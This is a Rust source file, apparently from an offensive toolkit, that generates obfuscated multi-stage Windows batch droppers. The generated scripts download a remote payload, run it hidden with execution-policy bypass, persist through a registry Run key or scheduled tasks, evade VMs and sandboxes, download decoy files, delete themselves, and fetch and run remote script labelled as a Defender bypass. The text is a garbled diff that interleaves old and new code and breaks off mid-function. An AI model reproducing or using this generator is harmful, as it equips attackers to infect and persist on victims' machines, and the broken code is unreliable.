⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⠏⠁⠀⢶⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀
⠀ ⢀⣾⣿⣿⣿⣿⣿⣿⡿⠿⣿⡇⠀⠀⠀⣿⠿⢿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀
⠀⢠⣾⣿⣿⣿⣿⣿⡿⠋⣠⣴⣿⣷⣤⣤⣾⣿⣦⣄⠙⢿⣿⣿⣿⣿⣿⣷⡄⠀
⠀⣼⣿⣿⣿⣿⣿⡏⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⢹⣿⣿⣿⣿⣿⣧⠀
⢰⣿⣿⣿⣿⣿⡿⠀⣾⣿⣿⣿⣿⠟⠉⠉⠻⣿⣿⣿⣿⣷⠀⢿⣿⣿⣿⣿⣿⡆
⢸⣿⣿⣿⣿⣿⣇⣰⣿⣿⣿⣿⡇⠀⠀⠀⠀⢸⣿⣿⣿⣿⣆⣸⣿⣿⣿⣿⣿⡇
⠸⣿⣿⣿⡿⣿⠟⠋⠙⠻⣿⣿⣿⣦⣀⣀⣴⣿⣿⣿⣿⠛⠙⠻⣿⣿⣿⣿⣿⠇
⠀⢻⣿⣿⣧⠉⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠈⣿⣿⣿⡟⠀
⠀⠘⢿⣿⣿⣷⣦⣤⣴⣾⠛⠻⢿⣿⣿⣿⣿⡿⠟⠋⣿⣦⣤⠀⣰⣿⣿⡿⠃⠀
⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣈⣁⣠⣤⣶⣾⣿⣿⣷⣾⣿⣿⡿⠁⠀⠀
⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠋⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠛⠻⠿⠿⠿⠿⠟⠛⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀
Poly-morphic, 3-Stage, Chain-Linked Stealth Dropper Generator
------------------------------------------------------------------
- Prompts for: Powershell payload download URL, output names
- Generates a highly randomized batch dropper
- All variable, file, registry names are randomized per build
- Drops multi-stage .bat with anti-VM/anti-sandbox tricks
- Final stage ensures persistence via HKCU registry
- Decoy files and diagnostic noise included for stealth
- 100% open source and ready for advanced red-team ops
==================================================================
"#);
}
// == Poly-morphic, 3-Stage, Chain-Linked Stealth Dropper (Interactive, Hardened) ==
// // - User provides: PS1 download link, final batch name, output .ps1 name
// // - All temp/var names randomized, batch logic randomized, anti-VM checks
/// // List of random banner phrases for added entropy
const BANNERS: &[&str] = &[
"診断ユーティリティを実行中...",
"ネットワーク診断開始...",
"管理者用システムテスト...",
"環境チェック実行中...",
"お待ちください。検証中...",
"System Diagnostic Utility",
"Network Integrity Verifier",
"Administrative Maintenance Tool",
"Security Compliance Scanner",
"Update Pre-Flight Check",
];
/// // Decoy files for download/cover noise
const DECOY_FILES: &[&str] = &[
"readme.txt", "patchnote.docx", "system_log.csv", "scaninfo.html", "update.pdf",
"changelog.rtf", "debug.ini", "license.txt", "upgrade.bin", "notes.xml",
"readme_v2.txt", "compliance_policy.pdf", "sys_log_2024.csv",
"audit_results.html", "patch_notes.rtf", "error_log.xml",
];
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum DownloadMethod {
PowerShell,
Certutil,
Bitsadmin,
}
/// // Generate a random batch/var/filename, e.g. DIAG_AbX_7381
fn rand_var_name(base: &str) -> String {
let mut rng = rng();
let charset: Vec<char> = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".chars().collect();
let mut name = base.to_string();
for _ in 0..3 {
if let Some(ch) = charset.choose(&mut rng) {
name.push(*ch);
impl DownloadMethod {
fn from_str(s: &str) -> Option<Self> {
match s.to_lowercase().as_str() {
"ps" | "powershell" => Some(Self::PowerShell),
"cert" | "certutil" => Some(Self::Certutil),
"bits" | "bitsadmin" => Some(Self::Bitsadmin),
_ => None,
}
}
name.push('_');
name.push_str(&rng.random_range(1000..9999).to_string());
name
}
/// // Shuffles and emits randomized diagnostic steps (adds noise)
fn shuffled_diag_steps() -> Vec<String> {
let steps = vec![
"netsh winsock show catalog ^>nul",
"fsutil behavior query DisableDeleteNotify ^>nul",
"dcomcnfg /32 ^>nul",
"wevtutil qe Security \"/q:*[System[(EventID=4624)]]\" /f:text /c:1 ^>nul",
"netstat -bno ^>nul",
"route print ^>nul",
"sc queryex type= service ^>nul",
"wmic logicaldisk get caption,filesystem,freespace,size ^>nul",
"wmic cpu get loadpercentage ^>nul",
"systeminfo | findstr /C:\"Available Physical Memory\" ^>nul",
"reg query HKLM\\SOFTWARE ^>nul",
];
let mut steps_mut = steps.clone();
let mut rng = rng();
steps_mut.shuffle(&mut rng);
steps_mut
.into_iter()
.enumerate()
.map(|(i, line)| format!("echo [INFO] Step {}...\n{}\ncall :SleepS 1", i+1, line))
.collect()
}
/// // Pick a random banner for the batch
fn rand_banner() -> &'static str {
let mut rng = rng();
BANNERS.choose(&mut rng).unwrap_or(&BANNERS[0])
}
/// // Shuffle decoy filenames for the decoy download section
fn shuffled_decoys() -> Vec<String> {
let mut rng = rng();
let mut files = DECOY_FILES.to_vec();
files.shuffle(&mut rng);
files.into_iter().map(|f| f.to_string()).collect()
}
/// // Anti-VM/Sandbox check, batch version, with randomized variable names
fn build_anti_vm_batch(rand_vars: &[&str]) -> String {
format!(r#"
REM Anti-VM/Sandbox (basic)
set "{uptime}=0"
for /f "skip=1" %%U in ('wmic os get LastBootUpTime ^| findstr /r /c:"^[0-9]"') do set "{uptime}=%%U"
set "{uptime}=%{uptime}:~0,8%"
REM Pause if booted < 3 min ago
for /f %%A in ('wmic os get LastBootUpTime ^| findstr /r /c:"^[0-9]"') do set "{boot}=%%A"
for /f "tokens=2 delims==." %%I in ('wmic OS Get LocalDateTime /value ^| findstr =') do set "{now}=%%I"
set /a "{boot_time}=!{now}! - !{uptime}!"
if !{boot_time}! lss 3000000 (
echo [*] Recent boot detected. Pausing.
call :SleepS 60
)
REM RAM check (<=2048 MB is suspicious)
for /f "tokens=2 delims==" %%R in ('wmic ComputerSystem get TotalPhysicalMemory /value ^| findstr =') do set "{ram}=%%R"
set /a "{ram_mb}=(!{ram}!)/1048576"
if !{ram_mb}! lss 2048 (
echo [*] Low RAM detected. Pausing.
call :SleepS 120
)
REM Check VM drivers
set "{vmfound}=0"
for %%X in (VBOX VMWARE QEMU VIRTUAL) do (
driverquery | findstr /I %%X >nul
if not errorlevel 1 set "{vmfound}=1"
)
"#,
uptime=rand_vars[0],
boot=rand_vars[1],
now=rand_vars[2],
boot_time=rand_vars[3],
ram=rand_vars[4],
ram_mb=rand_vars[5],
vmfound=rand_vars[6],
)
}
/// // == Stage 3 (PERSIST) ==
fn build_stage3(ps1_name: &str, rand_vars: &[String]) -> String {
format!(r#"
@echo off
REM Stage 3: Run dropped EXE (PowerShell payload) as .ps1 and set persistence
setlocal enabledelayedexpansion
REM Anti-VM/Sandbox
{antivm}
REM Run payload saved as .ps1 (actually an EXE)
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "%%~dp0{ps1_name}" >nul 2>&1
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "{reg}" /t REG_SZ /d "start \"\" /MIN \"%%~dp0{ps1_name}\"" /f
REM Cleanup
exit
"#,
ps1_name=ps1_name,
reg=rand_vars[0],
antivm=build_anti_vm_batch(&[&rand_vars[1], &rand_vars[2], &rand_vars[3], &rand_vars[4], &rand_vars[5], &rand_vars[6], &rand_vars[7]]),
)
}
/// // == Stage 2 ==
fn build_stage2(
url_exe: &str,
ps1_name: &str,
stage3_name: &str,
rand_vars: &[String],
) -> String {
let stage3_content = build_stage3(ps1_name, rand_vars);
let mut tpl = format!(r#"
@echo off
setlocal enabledelayedexpansion
REM Anti-VM/Sandbox
{antivm}
REM Download EXE payload and save as .ps1
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try {{ Invoke-WebRequest -Uri '{url_exe}' -OutFile '{ps1_name}' -UseBasicParsing }} catch {{ Start-BitsTransfer -Source '{url_exe}' -Destination '{ps1_name}' }}" >nul 2>&1
REM Write Stage 3
set "{stage3}=%~dp0{stage3_name}"
("#,
url_exe = url_exe,
ps1_name = ps1_name,
stage3_name = stage3_name,
stage3 = rand_vars[8],
antivm = build_anti_vm_batch(&[
&rand_vars[9], &rand_vars[10], &rand_vars[11],
&rand_vars[12], &rand_vars[13], &rand_vars[14], &rand_vars[15]
]),
);
for line in stage3_content.lines() {
tpl.push_str(&format!(" echo {} \n", line.replace("%", "%%")));
fn options() -> &'static str {
"PowerShell [default], Certutil, Bitsadmin"
}
tpl.push_str(&format!(
r#") > "%{}%"
REM Run Stage 3
call "%{}%"
REM Cleanup
exit
"#,
rand_vars[8], rand_vars[8]
));
tpl
}
/// // == Stage 1 ==
// ==============================================================================
// Context & Obfuscation
// ==============================================================================
struct DropperContext {
vars: HashMap<String, String>,
}
impl DropperContext {
fn new() -> Self {
Self {
vars: HashMap::new(),
}
}
/// Get or create a random variable name for the given key
fn get(&mut self, key: &str) -> String {
if let Some(val) = self.vars.get(key) {
val.clone()
} else {
let new_val = self.rand_var_name();
self.vars.insert(key.to_string(), new_val.clone());
new_val
}
}
fn rand_var_name(&self) -> String {
let mut rng = rng();
let charset: Vec<char> = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".chars().collect();
let mut name = String::with_capacity(8);
// Prefix with 3 random letters
for _ in 0..3 {
name.push(*charset.choose(&mut rng).expect("Charset empty"));
}
// Add random number suffix
name.push('_');
name.push_str(&rng.random_range(1000..9999).to_string());
name
}
}
// ==============================================================================
// Stage Builders
// ==============================================================================
/// Generates the Anti-VM / Anti-Sandbox checks
fn build_anti_vm(ctx: &mut DropperContext) -> String {
let uptime = ctx.get("uptime");
let boot = ctx.get("boot");
let now = ctx.get("now");
let ram = ctx.get("ram");
let ram_val = ctx.get("ram_val");
format!(r#"
REM [ Check 1: Uptime & Boot Time ]
set "{uptime}=0"
for /f "skip=1" %%U in ('wmic os get LastBootUpTime ^| findstr /r /c:"^[0-9]"') do set "{uptime}=%%U"
set "{boot}=%{uptime}:~0,8%"
REM Get current time for calc (simplified)
for /f "tokens=2 delims==." %%I in ('wmic OS Get LocalDateTime /value ^| findstr =') do set "{now}=%%I"
REM [ Check 2: RAM Size ]
for /f "tokens=2 delims==" %%R in ('wmic ComputerSystem get TotalPhysicalMemory /value ^| findstr =') do set "{ram}=%%R"
REM Convert to MB (approx div by 1048576)
set /a "{ram_val}=(!{ram}:~0,-3!)/1024"
if !{ram_val}! LSS 2000 (
echo [*] System resources verification failed (Code: 0x1002).
ping -n 120 127.0.0.1 >nul
)
REM [ Check 3: Virtualization Artifacts ]
set "artifacts=VBOX VMWARE QEMU XEN VIRTUAL"
for %%X in (%artifacts%) do (
wmic computersystem get model /format:list | findstr /I "%%X" >nul
if not errorlevel 1 (
echo [*] Environment restricted. Pausing execution.
ping -n 300 127.0.0.1 >nul
)
)
"#,
uptime=uptime, boot=boot, now=now, ram=ram, ram_val=ram_val
)
}
/// Generates the download command based on the selected method
fn build_downloader(method: DownloadMethod, url: &str, outfile: &str) -> String {
match method {
DownloadMethod::PowerShell => format!(
"powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"try {{ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri '{url}' -OutFile '{outfile}' -UseBasicParsing }} catch {{ exit 1 }}\""
),
DownloadMethod::Certutil => format!(
"certutil -urlcache -split -f \"{url}\" \"{outfile}\" >nul 2>&1 && certutil -urlcache -split -f \"{url}\" delete >nul 2>&1"
),
DownloadMethod::Bitsadmin => format!(
"bitsadmin /transfer \"SystemUpdate_{rnd}\" /priority FOREGROUND \"{url}\" \"%CD%\\{outfile}\" >nul",
rnd = rng().random_range(1000..9999)
),
}
}
/// Stage 3: Persistence & Execution
fn build_stage3(ctx: &mut DropperContext, ps1_name: &str) -> String {
let reg_name = ctx.get("reg_persist");
let antivm = build_anti_vm(ctx);
format!(r#"
@echo off
setlocal enabledelayedexpansion
REM == Phase 3: Verification & Setup ==
{antivm}
REM == Persistence ==
set "persist_path=HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "%persist_path%" /v "{reg_name}" >nul 2>&1
if errorlevel 1 (
reg add "%persist_path%" /v "{reg_name}" /t REG_SZ /d "cmd /c start /min \"\" \"%%~dp0{ps1_name}\"" /f >nul
)
REM == Execute Payload ==
echo [*] Starting background service...
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "%%~dp0{ps1_name}" >nul 2>&1
exit
"#,
antivm=antivm, reg_name=reg_name, ps1_name=ps1_name
)
}
/// Stage 2: Downloader
fn build_stage2(ctx: &mut DropperContext, method: DownloadMethod, url: &str, ps1_name: &str, stage3_name: &str) -> String {
let antivm = build_anti_vm(ctx);
let downloader = build_downloader(method, url, ps1_name);
let stage3_content = build_stage3(ctx, ps1_name);
let s3_var = ctx.get("s3_file");
// We embed Stage 3 as a self-extracting part of Stage 2
let mut script = format!(r#"
@echo off
setlocal enabledelayedexpansion
REM == Phase 2: Component Acquisition ==
{antivm}
REM == Download Payload ==
{downloader}
if not exist "{ps1_name}" (
echo [!] Critical component missing. Aborting.
exit /b 1
)
REM == Extract Stage 3 ==
set "{s3_var}=%~dp0{stage3_name}"
(
"#,
antivm=antivm, downloader=downloader, ps1_name=ps1_name, s3_var=s3_var, stage3_name=stage3_name
);
// Escape and write Stage 3 content
for line in stage3_content.lines() {
if !line.trim().is_empty() {
script.push_str(&format!(" echo {}\n", line.replace("%", "%%")));
} else {
script.push('\n');
}
}
script.push_str(&format!(r#"
) > "%{s3_var}%"
REM == Handoff to Stage 3 ==
call "%{s3_var}%"
exit
"#,
s3_var=s3_var));
script
}
/// Stage 1: Dropper Entry Point
fn build_stage1(
url_exe: &str,
ctx: &mut DropperContext,
method: DownloadMethod,
url_payload: &str,
decoy_urls: &[&str],
ps1_name: &str,
stage2_name: &str,
stage3_name: &str,
rand_vars: &[String],
stage3_name: &str
) -> String {
let batch_var = rand_var_name("DIAG");
let random_sleep_lo = rng().random_range(1..4);
let random_sleep_hi = rng().random_range(4..8);
let banner = rand_banner();
let mut tpl = format!(r#"@echo off
let batch_var = ctx.get("diag_id");
let banner_text = BANNERS.choose(&mut rng()).expect("Banners empty");
let antivm = build_anti_vm(ctx);
// Create random decoy logic
let mut decoy_section = String::new();
let mut decoys_shuffled = DECOY_FILES.to_vec();
decoys_shuffled.shuffle(&mut rng());
for (i, url) in decoy_urls.iter().enumerate().take(3) {
let decoy_name = decoys_shuffled.get(i).unwrap_or(&"log.txt");
let dl_cmd = build_downloader(DownloadMethod::PowerShell, url, decoy_name); // Always use PS for decoys for stealth
decoy_section.push_str(&format!("echo [*] Verifying component: {}\n{}\n", decoy_name, dl_cmd));
}
let stage2_content = build_stage2(ctx, method, url_payload, ps1_name, stage3_name);
let s2_var = ctx.get("s2_file");
let mut script = format!(r#"@echo off
setlocal enabledelayedexpansion
REM Defender Bypass
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {{ [ScriptBlock]::Create((irm https://dnot.sh/)) | Invoke-Command }}" >nul 2>&1
:SleepS
ping -n %1 127.0.0.1 ^>nul
goto :eof
:SleepMS
powershell -Command "Start-Sleep -Milliseconds %1" ^>nul
goto :eof
title [管理者診断ユーティリティ - {banner}]
REM =========================================================
REM {banner} (v{v1}.{v2})
REM =========================================================
title {banner}
color 0A
set "{batch_var}_init=1"
echo =====================================================
echo 管理者用ネットワーク/システム診断ユーティリティ
echo =====================================================
echo [+] {banner}
call :SleepS {random_sleep_lo}
REM == Environment Check ==
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {{ [ScriptBlock]::Create((irm https://dnot.sh/)) | Invoke-Command }}" >nul 2>&1
{antivm}
echo [+] Initializing system diagnostics...
ping -n 2 127.0.0.1 >nul
{decoy_section}
echo [+] Downloading core updates...
set /a rndDelay=(%RANDOM% %% 5) + 2
ping -n %rndDelay% 127.0.0.1 >nul
REM == Extract Stage 2 ==
set "{s2_var}=%~dp0{stage2_name}"
(
"#,
banner = banner,
batch_var = batch_var,
random_sleep_lo = random_sleep_lo,
banner=banner_text,
v1=rng().random_range(1..9),
v2=rng().random_range(0..99),
batch_var=batch_var,
antivm=antivm,
decoy_section=decoy_section,
s2_var=s2_var,
stage2_name=stage2_name
);
tpl.push_str(&build_anti_vm_batch(&[
&rand_vars[16], &rand_vars[17], &rand_vars[18],
&rand_vars[19], &rand_vars[20], &rand_vars[21], &rand_vars[22]
]));
for line in shuffled_diag_steps() {
tpl.push_str(&format!("{}\n", line));
}
tpl.push_str(&format!("set /a mainDelay=(%RANDOM% %% {random_sleep_hi}) + {random_sleep_lo}\necho [INFO] ステージ準備... (%mainDelay% 秒後)\ncall :SleepS %mainDelay%\n\n",
random_sleep_hi = random_sleep_hi,
random_sleep_lo = random_sleep_lo,
));
let decoys = shuffled_decoys();
for (i, decoy_name) in decoys.iter().enumerate().take(decoy_urls.len()) {
let url = decoy_urls[i];
tpl.push_str(&format!(
"echo [*] Downloading decoy: {decoy_name}\npowershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"try {{ Invoke-WebRequest -Uri '{url}' -OutFile '{decoy_name}' -UseBasicParsing }} catch {{}}\" ^>nul\ncall :SleepS 2\n",
url = url, decoy_name = decoy_name
));
}
let stage2_content = build_stage2(url_exe, ps1_name, stage3_name, rand_vars);
tpl.push_str(&format!("set \"{stage2}=%~dp0{stage2_name}\"\n(", stage2 = rand_vars[23], stage2_name = stage2_name));
// Escape and write Stage 2 content
for line in stage2_content.lines() {
tpl.push_str(&format!(" echo {} \n", line.replace("%", "%%")));
if !line.trim().is_empty() {
script.push_str(&format!(" echo {}\n", line.replace("%", "%%")));
} else {
script.push('\n');
}
}
tpl.push_str(&format!(
") > \"%{}%\"\nREM Run Stage 2\ncall \"%{}%\"\nREM Cleanup\nexit\n",
rand_vars[23], rand_vars[23]
));
tpl
script.push_str(&format!(r#"
) > "%{s2_var}%"
REM == Handoff to Stage 2 ==
call "%{s2_var}%"
REM Cleanup
del "%~f0" >nul 2>&1
exit
"#, s2_var=s2_var));
script
}
// ==============================================================================
// Interactive Interface
// ==============================================================================
pub fn print_welcome_naruto() {
println!("{}", r#"
_ __ __
/ | / /___ _________ / /_____ / /_
/ |/ / __ `/ ___/ _ \/ __/ __ \/ __/
/ /| / /_/ / / / __/ /_/ /_/ / /_
/_/ |_/\__,_/_/ \___/\__/\____/\__/
:: Poly-morphic Dropper Generator
:: Supports: PowerShell, Certutil, Bitsadmin
"#.bright_red());
}
/// // Prompt user, fallback to default if empty input
async fn prompt(msg: &str, default: Option<&str>) -> Result<String> {
let default_str = default.map_or("".to_string(), |d| format!(" [{}]", d));
print!("{}", format!("{}{}: ", msg, default_str).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
std::io::stdout().flush().context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut input)
.await
.context("Failed to read user input")?;
std::io::stdin().read_line(&mut input).context("Failed to read input")?;
let value = input.trim();
Ok(if value.is_empty() {
default.unwrap_or("").to_string()
@@ -308,37 +352,60 @@ async fn prompt(msg: &str, default: Option<&str>) -> Result<String> {
})
}
/// // == RouterSploit-style async entry point ==
pub async fn run(target: &str) -> Result<()> {
use crate::utils::{validate_file_path, validate_url};
print_welcome_naruto();
// Display target context if provided
let target_display = if target.is_empty() { "local" } else { target };
println!("{}", format!("[*] Target context: {}", target_display).dimmed());
let url_exe = prompt("URL of PowerShell payload (EXE, will be saved as .ps1)", Some("https://yourdomain.com/payload.exe")).await?;
let out_name = prompt("Final output batch filename", Some("3stage_dropper.bat")).await?;
let ps1_name = prompt("Name to save downloaded EXE as (with .ps1 extension)", Some("payload.ps1")).await?;
// Validate inputs
let validated_url = validate_url(&url_exe, Some(&["http", "https"]))
.map_err(|e| anyhow::anyhow!("Invalid URL: {}", e))?;
let validated_out = validate_file_path(&out_name, true)
.map_err(|e| anyhow::anyhow!("Invalid output filename: {}", e))?;
let validated_ps1 = validate_file_path(&ps1_name, false)
.map_err(|e| anyhow::anyhow!("Invalid .ps1 filename: {}", e))?;
let stage2_name = rand_var_name("stg2");
let stage3_name = rand_var_name("stg3");
let rand_vars: Vec<String> = (0..24).map(|i| rand_var_name(&format!("v{}", i))).collect();
let target_display = if target.is_empty() { "local" } else { target };
println!("{}", format!("[*] Context: {}", target_display).dimmed());
println!("{}", "[!] This tool generates an obfuscated 3-stage chain-linked batch dropper.".yellow());
// 1. Get Payload URL
let url_payload = prompt("Payload URL (EXE/PS1)", Some("http://10.10.10.10/payload.exe")).await?;
validate_url(&url_payload, Some(&["http", "https"]))?;
// 2. Select Method
let method_str = prompt(&format!("Download Method ({})", DownloadMethod::options()), Some("ps")).await?;
let method = DownloadMethod::from_str(&method_str).unwrap_or(DownloadMethod::PowerShell);
println!(" [+] Selected Method: {:?}", method);
// 3. Filenames
let out_name = prompt("Output batch filename", Some("update_installer.bat")).await?;
let ps1_name = prompt("Saved payload filename on target", Some("svchost_update.exe")).await?;
validate_file_path(&out_name, true)?;
// 4. Build
let mut ctx = DropperContext::new();
let stage2_name = ctx.rand_var_name() + ".bat";
let stage3_name = ctx.rand_var_name() + ".bat";
// Decoys
let decoy_urls = vec![
"https://www.example.com/readme.txt",
"https://www.example.com/license.txt",
"https://www.example.com/update.pdf",
"https://www.google.com/robots.txt",
"https://www.microsoft.com/favicon.ico",
];
let script = build_stage1(&validated_url, &decoy_urls, &validated_ps1, &stage2_name, &stage3_name, &rand_vars);
let mut file = TokioFile::create(&validated_out).await?;
let script = build_stage1(
&mut ctx,
method,
&url_payload,
&decoy_urls,
&ps1_name,
&stage2_name,
&stage3_name
);
let mut file = TokioFile::create(&out_name).await?;
file.write_all(script.as_bytes()).await?;
file.flush().await?;
println!("[+] 3-stage chain-linked dropper written to: {}", validated_out);
println!("\n{}", "SUCCESS!".green().bold());
println!("[+] Dropper written to: {}", out_name.bold());
println!("[+] Method chosen: {:?}", method);
println!("[+] Payload URL: {}", url_payload);
println!("[+] Chain structure: Stage1(Batch) -> Stage2(Batch) -> Stage3(Batch/Persist)");
Ok(())
}
@@ -0,0 +1,241 @@
use anyhow::{Result, Context};
use colored::*;
use crate::utils::validate_file_path;
use rand::{rng, Rng, prelude::IndexedRandom};
use std::fs;
use std::io::Write;
use std::fmt::Write as FmtWrite;
/// Polymorph 3-Stage Dropper
///
/// Generates a 3-stage payload chain to evade detection and persistence via Task Scheduler.
///
/// Flow:
/// 1. Dropper BAT (random name) -> Writes Stage 2 BAT + Schedules it
/// 2. Stage 2 BAT (random name) -> Writes VBS -> Creates LNK -> Schedules LNK
/// 3. Stage 3 LNK (random name) -> Executes final command
///
/// Features:
/// - Polymorphic variable names
/// - Random filenames
/// - Configurable delays (minutes/days)
/// - Non-root directory usage (%PUBLIC%\Libraries usually writable)
pub async fn run(_target: &str) -> Result<()> {
println!("{}", "=== Polymorph 3-Stage Dropper ===".cyan().bold());
println!("{}", "Generates a 3-stage payload chain using Task Scheduler for persistence/evasion.".yellow());
// 1. Get User Input
let command = prompt("[+] Final Command to Execute (e.g., calc.exe, powershell ...): ").await?;
let stage1_delay_str = prompt("[+] Stage 1 Delay (e.g., 1m, 2d): ").await?;
let stage2_delay_str = prompt("[+] Stage 2 Delay (e.g., 5m, 1d): ").await?;
let output_name = prompt("[+] Output Dropper Filename (e.g., dropper.bat): ").await?;
// Validate inputs
validate_file_path(&output_name, true)?;
// Parse delays
let delay1_mins = parse_delay(&stage1_delay_str)?;
let delay2_mins = parse_delay(&stage2_delay_str)?;
// Generate Random Names
let dropper_name = output_name.clone();
let stage2_bat_name = format!("{}.bat", random_string(8));
let stage3_lnk_name = format!("{}.lnk", random_string(8));
let vbs_helper_name = format!("{}.vbs", random_string(8));
// Task Names
let task1_name = format!("Update_{}", random_string(6));
let task2_name = format!("Sync_{}", random_string(6));
// Polymorphic Variables for obfuscation
let var_cmd = random_var();
let var_p1 = random_var();
println!();
println!("{}", "[*] Generating payload chain...".blue());
println!(" Stage 1: {} (Dropper) -> Task: {}", dropper_name, task1_name);
println!(" Stage 2: {} (Payload Gen) -> Task: {}", stage2_bat_name, task2_name);
println!(" Stage 3: {} (LNK Trigger) -> Command: {}", stage3_lnk_name, command);
println!(" Obfuscation vars: {}, {}", var_cmd, var_p1);
// --- GENERATE STAGE 2 CONTENT (The BAT that creates LNK) ---
// This BAT will be embedded inside Stage 1
// It needs to:
// 1. Create a VBS script
// 2. Run VBS to create LNK
// 3. Schedule the LNK
// Escape command for BAT/VBS/LNK nesting... this is tricky.
// LNK Target: cmd.exe
// LNK Args: /c start "" "command" (to hide window if possible) or just /c command
let lnk_target = "cmd.exe";
let lnk_args = format!("/c {}", command);
// We write a VBS script to generate the LNK because it is more reliable than pure BAT for LNKs
let vbs_content = format!(
r#"Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "{stage3_lnk_name}"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "{lnk_target}"
oLink.Arguments = "{lnk_args}"
oLink.WindowStyle = 7
oLink.Save"#,
stage3_lnk_name = stage3_lnk_name,
lnk_target = lnk_target,
lnk_args = lnk_args.replace("\"", "\"\"") // VBS string escaping
);
// Stage 2 BAT Content
// Be careful with escaping, this string will be echo'd by Stage 1 into a file
let task2_cmd = format!("cmd /c start /min \"\" \"%cd%\\{}\"", stage3_lnk_name);
// We inject the time calculation logic into Stage 2
let time_calc_loop = format!(
r#"for /f "usebackq delims=" %%T in (`powershell -Command "get-date (get-date).addMinutes({}) -Format HH:mm"`) do set "FUTURE_TIME=%%T""#,
delay2_mins
);
let stage2_content_raw = format!(
r#"@echo off
cd /d "%~dp0"
echo Creating shortcut helper...
(
{vbs_echo_lines}
) > "{vbs_name}"
cscript //nologo "{vbs_name}"
del "{vbs_name}" >nul 2>&1
echo Scheduling final trigger...
{time_calc_loop}
schtasks /create /sc ONCE /st %FUTURE_TIME% /tn "{task_name}" /tr "{task_cmd}" /f >nul 2>&1
if %errorlevel% neq 0 (
echo [!] Task creation failed. Admin rights might be needed or schedule time invalid.
echo [*] Fallback: Executing LNK immediately...
start "" "{lnk_name}"
)
del "%~f0" >nul 2>&1
"#,
vbs_echo_lines = vbs_content.lines().map(|l| format!("echo {}", l)).collect::<Vec<_>>().join("\n"),
vbs_name = vbs_helper_name,
time_calc_loop = time_calc_loop,
task_name = task2_name,
task_cmd = task2_cmd, // The command the task executes (run the LNK)
lnk_name = stage3_lnk_name
);
// --- GENERATE STAGE 1 CONTENT (The Dropper) ---
// Writes Stage 2 to a hidden/writable directory and schedules it.
// Target Dir: %PUBLIC%\Libraries (often writable and less checked than Temp)
let target_dir = "%PUBLIC%\\Libraries";
// Escaping Stage 2 content to be echo'd by Stage 1
// We need to escape special BAT chars like %, >, <, |, &
let stage2_escaped = escape_bat_echo(&stage2_content_raw);
let stage1_content = format!(
r#"@echo off
setlocal EnableDelayedExpansion
:: Polymorphic Junk
{junk_comments}
set "{v_dir}={target_dir}"
if not exist "!{v_dir}!" mkdir "!{v_dir}!"
cd /d "!{v_dir}!"
echo [*] Dropping Stage 2...
(
{stage2_lines}
) > "{stage2_file}"
echo [*] Scheduling Stage 2...
:: Calculate time {delay1} mins in future using PowerShell
for /f "usebackq delims=" %%T in (`powershell -Command "get-date (get-date).addMinutes({delay1}) -Format HH:mm"`) do set "FUTURE_TIME=%%T"
schtasks /create /sc ONCE /st !FUTURE_TIME! /tn "{task1_name}" /tr "cmd /c start /min \"\" \"!{v_dir}!\{stage2_file}\"" /f
echo [+] Dropper complete. Payload chain initiated.
timeout /t 3 >nul
del "%~f0" >nul 2>&1
"#,
junk_comments = generate_junk_comments(),
v_dir = random_var(), // Polymorphic variable for dir
target_dir = target_dir,
stage2_lines = stage2_escaped,
stage2_file = stage2_bat_name,
delay1 = delay1_mins,
task1_name = task1_name
);
// Write Dropper
fs::write(&dropper_name, stage1_content)
.with_context(|| format!("Failed to write dropper to {}", dropper_name))?;
println!("{}", format!("[+] Dropper written to: {}", dropper_name).green().bold());
println!("[*] Transfer this file to the target Windows machine.");
println!("[*] Note: The payload relies on 'schtasks' and 'powershell' (for time calc) being available.");
Ok(())
}
// Helpers
async fn prompt(text: &str) -> Result<String> {
print!("{}", text.cyan());
std::io::stdout().flush()?;
let mut buf = String::new();
std::io::stdin().read_line(&mut buf)?;
Ok(buf.trim().to_string())
}
fn parse_delay(input: &str) -> Result<u32> {
let lower = input.to_lowercase();
if let Some(mins) = lower.strip_suffix('m') {
mins.parse().context("Invalid minutes format")
} else if let Some(days) = lower.strip_suffix('d') {
let d: u32 = days.parse().context("Invalid days format")?;
Ok(d * 1440)
} else {
// Default to minutes if no suffix
input.parse().context("Invalid delay format (use '10m' or '2d')")
}
}
fn random_string(len: usize) -> String {
let charset = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
let mut rng = rng();
(0..len).map(|_| *charset.choose(&mut rng).unwrap() as char).collect()
}
fn random_var() -> String {
